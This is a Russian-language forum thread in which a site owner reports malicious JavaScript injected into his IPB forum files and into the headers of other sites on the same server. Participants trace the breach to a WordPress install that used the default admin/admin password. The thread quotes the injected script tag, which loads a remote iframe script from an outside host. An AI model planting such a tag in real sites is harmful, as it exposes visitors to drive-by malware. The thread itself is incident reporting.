andreuka Опубликовано 22 августа, 2013 Поделиться Опубликовано 22 августа, 2013 Здравствуйте, сегодня обнаружил у меня в ipb подключение js скрипта с сайта stummann.net. Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php? Выглядит это както так <script language="JavaScript" src="__stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script> Само содержание скрипта дает понять что он банально открывает маленький iframe, через который чаще всего распространяются вирусы. Проверяйте свои сообщества! А то побанят всех)) Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
spoken Опубликовано 22 августа, 2013 Поделиться Опубликовано 22 августа, 2013 Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php? На этот вопрос только расследование взлома может дать ответ. Надо изучать логи, бэкапы и т.д, и т.п. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Respected Опубликовано 22 августа, 2013 Поделиться Опубликовано 22 августа, 2013 А версия форума последняя? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
andreuka Опубликовано 22 августа, 2013 Автор Поделиться Опубликовано 22 августа, 2013 Уже все расследовал. Теория такая На 1 и том же сервере стоит еще несколько wordpress, на 1 из них стоял стандартный пароль admin admin Только что прогнал все файлы через антивирус, и именно на том сайте нашел php.shell и php.exploit. Так что это похоже на последствие массовой атаки на wordpress spoken 1 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Lordbl4 Опубликовано 22 августа, 2013 Поделиться Опубликовано 22 августа, 2013 WP такой WP... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
andreuka Опубликовано 22 августа, 2013 Автор Поделиться Опубликовано 22 августа, 2013 (изменено) В шапке всех других сайтов тоже появился этот скрипт Он вставляется во всех php файлах где есть </head> Изменено 22 августа, 2013 пользователем andreuka Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.